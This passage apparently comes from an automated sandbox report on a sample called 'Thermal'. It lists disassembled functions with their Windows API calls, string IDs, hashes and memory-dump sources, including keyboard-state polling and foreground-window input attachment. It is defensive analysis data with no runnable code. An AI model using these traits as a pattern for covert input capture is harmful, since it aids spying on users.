                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                • API String ID: 2820617543-1000479233
                                                • Opcode ID: 0db117fafdf28cd5e3fd2a981ffc290a5f87ce6f56959a5ea4dac9c0e19c7638
                                                • Instruction ID: 91692bd531f0ce67243e78a726fbef7a8b8890a148ff5b195ce83951b3d600f2
                                                • Opcode Fuzzy Hash: 0db117fafdf28cd5e3fd2a981ffc290a5f87ce6f56959a5ea4dac9c0e19c7638
                                                • Instruction Fuzzy Hash: 7A51EF30218305EFCB14EF14D885AAAB7B5FF90340F54481EF595972A2DB38ED49CB82
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: __i64tow__itow__swprintf
                                                • String ID: %.15g$0x%p$False$True
                                                • API String ID: 421087845-2263619337
                                                • Opcode ID: 0086e4b524865c811db3fed414d2099af6df53d3aa35c6c7bdeed40beff0a0f1
                                                • Instruction ID: 02d3b7bfc699523b2950388b193e9602c3f4e59b634afa4aa0057720491e813d
                                                • Opcode Fuzzy Hash: 0086e4b524865c811db3fed414d2099af6df53d3aa35c6c7bdeed40beff0a0f1
                                                • Instruction Fuzzy Hash: A141E571604609EFDF34EF64D845E7973E8EB45340F20856AE18ED7292EB399D428711
                                                APIs
                                                • _memset.LIBCMT ref: 007F778F
                                                • CreateMenu.USER32 ref: 007F77AA
                                                • SetMenu.USER32(?,00000000), ref: 007F77B9
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007F7846
                                                • IsMenu.USER32(?), ref: 007F785C
                                                • CreatePopupMenu.USER32 ref: 007F7866
                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007F7893
                                                • DrawMenuBar.USER32 ref: 007F789B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                • String ID: 0$F
                                                • API String ID: 176399719-3044882817
                                                • Opcode ID: 45bdfe48e7a98d2ef8e4d578c88337905aef9755518ba52eb8a219b7176174cc
                                                • Instruction ID: 138b0d3346fbdf41ed4111f537087f3bd4b1c86b8329cf4e8dec98c553369f0a
                                                • Opcode Fuzzy Hash: 45bdfe48e7a98d2ef8e4d578c88337905aef9755518ba52eb8a219b7176174cc
                                                • Instruction Fuzzy Hash: AF414974A04209EFEB24DF64D888BAABBF5FF49350F144429FA45A7361D735A910CFA0
                                                APIs
                                                • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 007F7B83
                                                • CreateCompatibleDC.GDI32(00000000), ref: 007F7B8A
                                                • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 007F7B9D
                                                • SelectObject.GDI32(00000000,00000000), ref: 007F7BA5
                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 007F7BB0
                                                • DeleteDC.GDI32(00000000), ref: 007F7BB9
                                                • GetWindowLongW.USER32(?,000000EC), ref: 007F7BC3
                                                • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 007F7BD7
                                                • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 007F7BE3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                • String ID: static
                                                • API String ID: 2559357485-2160076837
                                                • Opcode ID: a215cfb798b8ef10b62c7178518c5c810577c2ea2340deab8e16f01e4fd30de4
                                                • Instruction ID: 76c249524833553c62c1e9abc6d50fcc9076b0416dea84c603e095a1d989e9ec
                                                • Opcode Fuzzy Hash: a215cfb798b8ef10b62c7178518c5c810577c2ea2340deab8e16f01e4fd30de4
                                                • Instruction Fuzzy Hash: DC318D72104219AFDF159F64DC49FEB3B69FF0A320F110215FA65A22A0CB39D821DFA0
                                                APIs
                                                • _memset.LIBCMT ref: 0079706B
                                                  • Part of subcall function 00798D58: __getptd_noexit.LIBCMT ref: 00798D58
                                                • __gmtime64_s.LIBCMT ref: 00797104
                                                • __gmtime64_s.LIBCMT ref: 0079713A
                                                • __gmtime64_s.LIBCMT ref: 00797157
                                                • __allrem.LIBCMT ref: 007971AD
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007971C9
                                                • __allrem.LIBCMT ref: 007971E0
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007971FE
                                                • __allrem.LIBCMT ref: 00797215
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00797233
                                                • __invoke_watson.LIBCMT ref: 007972A4
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                • String ID:
                                                • API String ID: 384356119-0
                                                • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                • Instruction ID: d56ffec24a5b46b2d32a5b15fd797d6c77ce4b7e26f7564e8041e8fa8b87022e
                                                • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                • Instruction Fuzzy Hash: 54710671A14706EBDB189F7DEC46B6AB3B9BF81320F14422AF514E7281E778DA00C790
                                                APIs
                                                • _memset.LIBCMT ref: 007D2CE9
                                                • GetMenuItemInfoW.USER32(00837890,000000FF,00000000,00000030), ref: 007D2D4A
                                                • SetMenuItemInfoW.USER32(00837890,00000004,00000000,00000030), ref: 007D2D80
                                                • Sleep.KERNEL32(000001F4), ref: 007D2D92
                                                • GetMenuItemCount.USER32(?), ref: 007D2DD6
                                                • GetMenuItemID.USER32(?,00000000), ref: 007D2DF2
                                                • GetMenuItemID.USER32(?,-00000001), ref: 007D2E1C
                                                • GetMenuItemID.USER32(?,?), ref: 007D2E61
                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007D2EA7
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007D2EBB
                                                • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007D2EDC
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                • String ID:
                                                • API String ID: 4176008265-0
                                                • Opcode ID: 37f87131d8f8c936f42cf2dbdb04e6fdef1351d3469f285b7ebbfd5cdaf95441
                                                • Instruction ID: 43c4fd2e697c085e75633bca962331bd9350d0e81cc07e2e65b58243ab11e9c1
                                                • Opcode Fuzzy Hash: 37f87131d8f8c936f42cf2dbdb04e6fdef1351d3469f285b7ebbfd5cdaf95441
                                                • Instruction Fuzzy Hash: 2B619EB0A00249AFDB21DF64CD88ABEBBB9FB50304F14045AF841A7352D739AD07DB21
                                                APIs
                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 007F75CA
                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 007F75CD
                                                • GetWindowLongW.USER32(?,000000F0), ref: 007F75F1
                                                • _memset.LIBCMT ref: 007F7602
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007F7614
                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007F768C
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSend$LongWindow_memset
                                                • String ID:
                                                • API String ID: 830647256-0
                                                • Opcode ID: 282a1f37d4f972f4070d161b185a5fe01db75f7457b60d9a54afb59aded9132b
                                                • Instruction ID: ee08c96061a6ad169752113fdd0781ef5cd262a24be447221a50085855a2c592
                                                • Opcode Fuzzy Hash: 282a1f37d4f972f4070d161b185a5fe01db75f7457b60d9a54afb59aded9132b
                                                • Instruction Fuzzy Hash: 23616975904208AFDB20DFA8CC85EFE77B8EB49710F1001A9FA15A73A1D774AE51DB60
                                                APIs
                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 007C77DD
                                                • SafeArrayAllocData.OLEAUT32(?), ref: 007C7836
                                                • VariantInit.OLEAUT32(?), ref: 007C7848
                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 007C7868
                                                • VariantCopy.OLEAUT32(?,?), ref: 007C78BB
                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 007C78CF
                                                • VariantClear.OLEAUT32(?), ref: 007C78E4
                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 007C78F1
                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007C78FA
                                                • VariantClear.OLEAUT32(?), ref: 007C790C
                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007C7917
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                • String ID:
                                                • API String ID: 2706829360-0
                                                • Opcode ID: 3526f6e26fdb0acbbc155ece02fa6120f5871bebb549f6fcf883e6f53b5135b3
                                                • Instruction ID: e786ac427cf10498b319620510601d2857bb019a2485adec3b638b5c167dca47
                                                • Opcode Fuzzy Hash: 3526f6e26fdb0acbbc155ece02fa6120f5871bebb549f6fcf883e6f53b5135b3
                                                • Instruction Fuzzy Hash: 9B414235A04219DFCF14DFA4D888EADBBB9FF48354F00806DEA55A7261CB34A945CFA4
                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 007D0530
                                                • GetAsyncKeyState.USER32(000000A0), ref: 007D05B1
                                                • GetKeyState.USER32(000000A0), ref: 007D05CC
                                                • GetAsyncKeyState.USER32(000000A1), ref: 007D05E6
                                                • GetKeyState.USER32(000000A1), ref: 007D05FB
                                                • GetAsyncKeyState.USER32(00000011), ref: 007D0613
                                                • GetKeyState.USER32(00000011), ref: 007D0625
                                                • GetAsyncKeyState.USER32(00000012), ref: 007D063D
                                                • GetKeyState.USER32(00000012), ref: 007D064F
                                                • GetAsyncKeyState.USER32(0000005B), ref: 007D0667
                                                • GetKeyState.USER32(0000005B), ref: 007D0679
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: State$Async$Keyboard
                                                • String ID:
                                                • API String ID: 541375521-0
                                                • Opcode ID: 4b76b592c6679f431dc3596f756be8cd16a6a0a490a4f7f1a1401cd997b94ef1
                                                • Instruction ID: d589e712306399073522d1aac5ced109870c8b987b37c22b9ffb9f72223165ac
                                                • Opcode Fuzzy Hash: 4b76b592c6679f431dc3596f756be8cd16a6a0a490a4f7f1a1401cd997b94ef1
                                                • Instruction Fuzzy Hash: 2541C4345047CA6DFF708A6498047B5BEB06B51304F08619BD9C6577C2EAACD9E8CFE2
                                                APIs
                                                  • Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
                                                  • Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC
                                                • CoInitialize.OLE32 ref: 007E8AED
                                                • CoUninitialize.OLE32 ref: 007E8AF8
                                                • CoCreateInstance.OLE32(?,00000000,00000017,00803BBC,?), ref: 007E8B58
                                                • IIDFromString.OLE32(?,?), ref: 007E8BCB
                                                • VariantInit.OLEAUT32(?), ref: 007E8C65
                                                • VariantClear.OLEAUT32(?), ref: 007E8CC6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                • API String ID: 834269672-1287834457
                                                • Opcode ID: c66ce1c5aed6241b10424f1c17f06e077054ef8cbf7e24df04a76cfafc069106
                                                • Instruction ID: 9284c0239852e51d819c4afa08d894dc41f729b47dcd85d4937b814aea90f3fd
                                                • Opcode Fuzzy Hash: c66ce1c5aed6241b10424f1c17f06e077054ef8cbf7e24df04a76cfafc069106
                                                • Instruction Fuzzy Hash: E461AAB0206751DFC750DF11C888B6AB7E8BF49714F104859F9899B2A1CB78ED44CBA3
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 007DBB13
                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 007DBB89
                                                • GetLastError.KERNEL32 ref: 007DBB93
                                                • SetErrorMode.KERNEL32(00000000,READY), ref: 007DBC00
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                • API String ID: 4194297153-14809454
                                                • Opcode ID: f74043443feb7082579cb3b4c68fd7a1229ad53b29f4d3daa73304467240b657
                                                • Instruction ID: b61998826151320a30230ac1b7af2affcaec6c57cdc21fc95ea4597566a5919f
                                                • Opcode Fuzzy Hash: f74043443feb7082579cb3b4c68fd7a1229ad53b29f4d3daa73304467240b657
                                                • Instruction Fuzzy Hash: 4E31AF75A00209EFCB10EF64C849EA9B7B8FF44300F55806BE806E7395DB789941CB90
                                                APIs
                                                  • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                  • Part of subcall function 007CB79A: GetClassNameW.USER32(?,?,000000FF), ref: 007CB7BD
                                                • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 007C9BCC
                                                • GetDlgCtrlID.USER32 ref: 007C9BD7
                                                • GetParent.USER32 ref: 007C9BF3
                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 007C9BF6
                                                • GetDlgCtrlID.USER32(?), ref: 007C9BFF
                                                • GetParent.USER32(?), ref: 007C9C1B
                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 007C9C1E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 1536045017-1403004172
                                                • Opcode ID: 3b1858b6664ca1b3c3e989c102020d4dc7e1c9de3efc7c2f3912b489dcde0d72
                                                • Instruction ID: 777f8d99eb0f50a9f262169d886de38a5838effd227dbe0c07db4158f062618e
                                                • Opcode Fuzzy Hash: 3b1858b6664ca1b3c3e989c102020d4dc7e1c9de3efc7c2f3912b489dcde0d72
                                                • Instruction Fuzzy Hash: 1B21C170940204BBCF04EBA0DC89EFEBBB9EF95310F50025AF96193291EB7958159B20
                                                APIs
                                                  • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                  • Part of subcall function 007CB79A: GetClassNameW.USER32(?,?,000000FF), ref: 007CB7BD
                                                • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 007C9CB5
                                                • GetDlgCtrlID.USER32 ref: 007C9CC0
                                                • GetParent.USER32 ref: 007C9CDC
                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 007C9CDF
                                                • GetDlgCtrlID.USER32(?), ref: 007C9CE8
                                                • GetParent.USER32(?), ref: 007C9D04
                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 007C9D07
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 1536045017-1403004172
                                                • Opcode ID: 7f0a93da48744cd75a9da76b7c873e8ab4f134e8ccb144190f55e0c17626d64c
                                                • Instruction ID: abec542faebebdc4988d6bf674f3035a6fd95b87b7908d869780c1b0496dcd10
                                                • Opcode Fuzzy Hash: 7f0a93da48744cd75a9da76b7c873e8ab4f134e8ccb144190f55e0c17626d64c
                                                • Instruction Fuzzy Hash: EA21A175A40204BBDF54ABB0CC89FFEBBB9EF94300F500119B96197291EB7989259B20
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 007E8FC1
                                                • CoInitialize.OLE32(00000000), ref: 007E8FEE
                                                • CoUninitialize.OLE32 ref: 007E8FF8
                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 007E90F8
                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 007E9225
                                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00803BDC), ref: 007E9259
                                                • CoGetObject.OLE32(?,00000000,00803BDC,?), ref: 007E927C
                                                • SetErrorMode.KERNEL32(00000000), ref: 007E928F
                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 007E930F
                                                • VariantClear.OLEAUT32(?), ref: 007E931F
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                • String ID:
                                                • API String ID: 2395222682-0
                                                • Opcode ID: afbf60e2fc6bd1119ba0afaa8342cca08efc3a4103f494cc65cdc5e8fc298e13
                                                • Instruction ID: 6349fdbc07074a89d64d6296bbec5ddc9c05139d1d1c5db976d0e562e139f547
                                                • Opcode Fuzzy Hash: afbf60e2fc6bd1119ba0afaa8342cca08efc3a4103f494cc65cdc5e8fc298e13
                                                • Instruction Fuzzy Hash: 82C11372608345AFC740DF65C88892AB7E9FF89348F00491DFA8A9B251DB75ED05CB52
                                                APIs
                                                • GetCurrentThreadId.KERNEL32 ref: 007D19EF
                                                • GetForegroundWindow.USER32(00000000,?,?,?,?,?,007D0A67,?,00000001), ref: 007D1A03
                                                • GetWindowThreadProcessId.USER32(00000000), ref: 007D1A0A
                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007D0A67,?,00000001), ref: 007D1A19
                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 007D1A2B
                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007D0A67,?,00000001), ref: 007D1A44
                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007D0A67,?,00000001), ref: 007D1A56
                                                • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,007D0A67,?,00000001), ref: 007D1A9B
                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,007D0A67,?,00000001), ref: 007D1AB0
                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,007D0A67,?,00000001), ref: 007D1ABB
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                • String ID:
                                                • API String ID: 2156557900-0
                                                • Opcode ID: df2293b521db3624461b14e36dfa58d1a2d0eecedd72a7bba334a882c0c011cc
                                                • Instruction ID: b9ab306e5f173c9759ac7754f37daff9644eacc5bbb501a9a43175a484435553
                                                • Opcode Fuzzy Hash: df2293b521db3624461b14e36dfa58d1a2d0eecedd72a7bba334a882c0c011cc
                                                • Instruction Fuzzy Hash: B0315CB1601304FFEB10DB54DD48BA97BBABBE4315F508516F905962A0DFB99D408F60
                                                APIs
                                                • GetSysColor.USER32(00000008), ref: 0077260D
                                                • SetTextColor.GDI32(?,000000FF), ref: 00772617
